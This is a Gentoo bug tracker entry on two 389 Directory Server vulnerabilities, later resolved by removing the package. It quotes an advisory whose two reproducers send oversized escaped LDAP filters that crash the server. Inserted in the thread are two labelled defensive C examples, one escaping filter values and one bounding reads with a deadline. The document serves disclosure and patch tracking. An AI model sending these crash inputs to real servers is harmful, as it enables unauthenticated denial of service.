
Bug 655176 (CVE-2018-1089, CVE-2019-3883)

Summary: net-nds/389-ds-base: Multiple vulnerabilities (CVE-2018-1089,CVE-2019-3883)
Product: Gentoo Security Reporter: Agostino Sarubbo <ago>
Component: Vulnerabilities Assignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: trivial CC: jstein, maintainer-needed, treecleaner, wes, wibrown
Priority: Normal Keywords: PullRequest
Version: unspecified   
Hardware: All   
OS: Linux   
URL: http://www.openwall.com/lists/oss-security/2018/05/07/2
See Also: https://bugs.gentoo.org/show_bug.cgi?id=701812
https://github.com/gentoo/gentoo/pull/15907
Whiteboard: ~3 [noglsa upstream/ebuild cve]
Package list:
Runtime testing required: ---
Bug Depends on: 731296    
Bug Blocks:    

Description Agostino Sarubbo gentoo-dev 2018-05-07 15:53:08 UTC
From ${URL} :

This is to disclose the following flaw, CVE-2018-1089 :

389-ds-base, a.k.a 389 Directory Server, https://pagure.io/389-ds-base/,
is a highly usable, fully featured, reliable and secure LDAP server
implementation. It handles many of the largest LDAP deployments in the
world.

389-ds server did not properly handle characters needed to be escaped in
its query filter. This could result in buffer overflows, from the heap
or the stack, on larger filters.  An unauthenticated attacker could send
a specially crafted LDAP request and crash the server. RCE has not been
demonstrated at this time.

Red Hat would like to thank Greg Kubok for alerting us of the issue.


Reproducer1 :
[root@server1 ~]# payload=$(printf '.*$%.0s' {1..1000})
[root@server1 ~]# ldapsearch -h localhost -p 389 -x -b "dc=blah"
"(&(|(telephoneNumber=*${payload}*)(uid=*${payload}*)(title=*${payload}*)(sn=*${payload}*)(ou=*${payload}*)(givenName=*${payload}*))(objectClass=posixaccount))"
"telephoneNumber sshpubkeyfp ipaSshPubKey uid krbCanonicalName title
loginShell uidNumber gidNumber sn homeDirectory mail krbPrincipalName
givenName nsAccountLock"

Reproducer2:
[root@server1 ~]# perl -e 'print ".*\$" x (1400)' | ldapsearch -x -f-
"(&(uid=%s)(objectClass=posixaccount))"



@maintainer(s): since the package or the affected version has never been marked as stable, we don't need to stabilize it. After the bump, please remove the affected versions from the tree.
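
The advisory above ties the overflow to characters that need escaping in large filters. As an added example (not 389-ds code and not part of the advisory), the C routine below applies RFC 4515 value escaping with an explicit capacity check, so escaped output that can grow to three times the input is rejected instead of written past the buffer. The function names are hypothetical, and the escaping done inside 389-ds may differ.

```c
#include <stdio.h>
#include <string.h>

/* Bytes RFC 4515 requires to be escaped inside a filter assertion value. */
static int needs_escape(unsigned char c)
{
    return c == '*' || c == '(' || c == ')' || c == '\\' || c == '\0';
}

/* Exact buffer size the escaped form needs, including the trailing NUL. */
size_t escaped_size(const char *in, size_t in_len)
{
    size_t n = 1;
    for (size_t i = 0; i < in_len; i++)
        n += needs_escape((unsigned char)in[i]) ? 3 : 1;
    return n;
}

/* Returns the escaped length, or -1 if out_cap is too small; never writes past it. */
long escape_filter_value(const char *in, size_t in_len, char *out, size_t out_cap)
{
    static const char hex[] = "0123456789abcdef";
    size_t o = 0;
    if (out_cap == 0) return -1;
    for (size_t i = 0; i < in_len; i++) {
        unsigned char c = (unsigned char)in[i];
        size_t need = needs_escape(c) ? 3 : 1;
        if (need >= out_cap - o) {      /* one byte stays reserved for the NUL */
            out[0] = '\0';
            return -1;
        }
        if (need == 3) {                /* emit "\XX", two hex digits */
            out[o++] = '\\';
            out[o++] = hex[c >> 4];
            out[o++] = hex[c & 0x0f];
        } else {
            out[o++] = (char)c;
        }
    }
    out[o] = '\0';
    return (long)o;
}

int main(void)
{
    char in[20], out[32];   /* constructed input: 20 asterisks need 61 bytes */
    memset(in, '*', sizeof in);
    printf("rc=%ld\n", escape_filter_value(in, sizeof in, out, sizeof out));
    return 0;
}
```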
Comment 1 Jonas Stein gentoo-dev 2019-06-02 12:44:55 UTC
The package has no maintainer any more.
Comment 2 GLSAMaker/CVETool Bot gentoo-dev 2020-04-16 23:09:22 UTC
CVE-2019-3883 (https://nvd.nist.gov/vuln/detail/CVE-2019-3883):
  In 389-ds-base up to version 1.4.1.2, requests are handled by worker
  threads. Each socket will be waited by the worker for at most
  'ioblocktimeout' seconds. However this timeout applies only for un-encrypted
  requests. Connections using SSL/TLS are not taking this timeout into account
  during reads, and may hang longer. An unauthenticated attacker could
  repeatedly create hanging LDAP requests to hang all the workers, resulting
  in a Denial of Service.
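
The CVE-2019-3883 description above is about a read timeout that one code path did not enforce. As an added example (generic POSIX C, not 389-ds code), the helper below bounds a whole read by a single deadline that partial data does not reset, so a stalled peer releases the worker. It assumes a plain file descriptor; `read_with_deadline` and `simulate_peer` are hypothetical names, and the stalled peer is constructed with `socketpair`.

```c
#define _POSIX_C_SOURCE 200809L /* for clock_gettime */
#include <errno.h>
#include <poll.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

static long now_ms(void)
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return ts.tv_sec * 1000L + ts.tv_nsec / 1000000L;
}

/* Read exactly len bytes, or give up once timeout_ms has elapsed in total.
 * Returns bytes read (short count: peer closed), -1 on error, -2 on timeout. */
long read_with_deadline(int fd, char *buf, size_t len, int timeout_ms)
{
    long deadline = now_ms() + timeout_ms;
    size_t got = 0;
    while (got < len) {
        long left = deadline - now_ms();
        struct pollfd p = { .fd = fd, .events = POLLIN };
        int rc = left > 0 ? poll(&p, 1, (int)left) : 0;
        if (rc == 0) return -2;                    /* deadline reached */
        if (rc < 0) { if (errno == EINTR) continue; return -1; }
        ssize_t n = read(fd, buf + got, len - got);
        if (n < 0) { if (errno == EINTR) continue; return -1; }
        if (n == 0) break;                         /* peer closed */
        got += (size_t)n;
    }
    return (long)got;
}

/* Constructed scenario: the peer sends `sent` of 4 expected bytes, then stalls. */
long simulate_peer(size_t sent, int timeout_ms)
{
    int sv[2];
    char buf[4];
    long rc = -1;
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0) return -1;
    if (sent == 0 || write(sv[1], "abcd", sent) == (ssize_t)sent)
        rc = read_with_deadline(sv[0], buf, sizeof buf, timeout_ms);
    close(sv[0]); close(sv[1]);
    return rc;
}

int main(void) { return simulate_peer(2, 100) == -2 ? 0 : 1; }
```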
Comment 3 Larry the Git Cow gentoo-dev 2020-06-04 19:14:55 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=66a48ca5d52d4699c4ef38209dfcad8ebdd149aa

commit 66a48ca5d52d4699c4ef38209dfcad8ebdd149aa
Author:     Sam James (sam_c) <sam@cmpct.info>
AuthorDate: 2020-06-04 18:24:47 +0000
Commit:     Thomas Deutschmann <whissi@gentoo.org>
CommitDate: 2020-06-04 19:14:36 +0000

    net-nds/389-ds-base, dev-libs/389-adminutil: Last rites
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Sam James (sam_c) <sam@cmpct.info>
    Signed-off-by: Thomas Deutschmann <whissi@gentoo.org>

 profiles/package.mask | 10 ++++++++--
 1 file changed, 8 insertions(+), 2 deletions(-)
Comment 4 Larry the Git Cow gentoo-dev 2020-07-13 04:53:09 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=7414f8c33bb75cd9a4f6a61040886852fcf2afe1

commit 7414f8c33bb75cd9a4f6a61040886852fcf2afe1
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:52:07 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:31 +0000

    dev-libs/svrcore: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/svrcore/Manifest                         |   2 -
 dev-libs/svrcore/files/svrcore-4.0.4-gentoo.patch | 100 ----------------------
 dev-libs/svrcore/files/svrcore-4.1-gentoo.patch   | 100 ----------------------
 dev-libs/svrcore/metadata.xml                     |   5 --
 dev-libs/svrcore/svrcore-4.0.4-r1.ebuild          |  40 ---------
 dev-libs/svrcore/svrcore-4.1.2.ebuild             |  35 --------
 profiles/package.mask                             |   6 --
 7 files changed, 288 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=aef3f76fb5607ea9fcecd97c192a0ab06d224737

commit aef3f76fb5607ea9fcecd97c192a0ab06d224737
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:51:55 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:27 +0000

    dev-libs/389-adminutil: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 dev-libs/389-adminutil/389-adminutil-1.1.15.ebuild | 46 ----------------------
 dev-libs/389-adminutil/Manifest                    |  1 -
 dev-libs/389-adminutil/metadata.xml                |  5 ---
 profiles/package.mask                              |  2 -
 4 files changed, 54 deletions(-)

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=eb6602276b3003bcdafd619a28ac6f163f52fb30

commit eb6602276b3003bcdafd619a28ac6f163f52fb30
Author:     Michał Górny <mgorny@gentoo.org>
AuthorDate: 2020-07-13 04:50:40 +0000
Commit:     Michał Górny <mgorny@gentoo.org>
CommitDate: 2020-07-13 04:52:23 +0000

    net-nds/389-ds-base: Remove last-rited pkg
    
    Bug: https://bugs.gentoo.org/655176
    Bug: https://bugs.gentoo.org/701812
    Signed-off-by: Michał Górny <mgorny@gentoo.org>

 net-nds/389-ds-base/389-ds-base-1.3.6.8-r1.ebuild  | 126 -------
 net-nds/389-ds-base/389-ds-base-9999.ebuild        | 133 --------
 net-nds/389-ds-base/Manifest                       |   1 -
 ...-base-1.3.6-backport-invalid-password-mig.patch | 376 ---------------------
 net-nds/389-ds-base/files/389-ds-snmp.initd        |  44 ---
 net-nds/389-ds-base/files/389-ds.initd-r1          |  90 -----
 net-nds/389-ds-base/metadata.xml                   |  23 --
 7 files changed, 793 deletions(-)
Comment 5 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2020-07-26 05:51:35 UTC
~ package so noglsa, closing.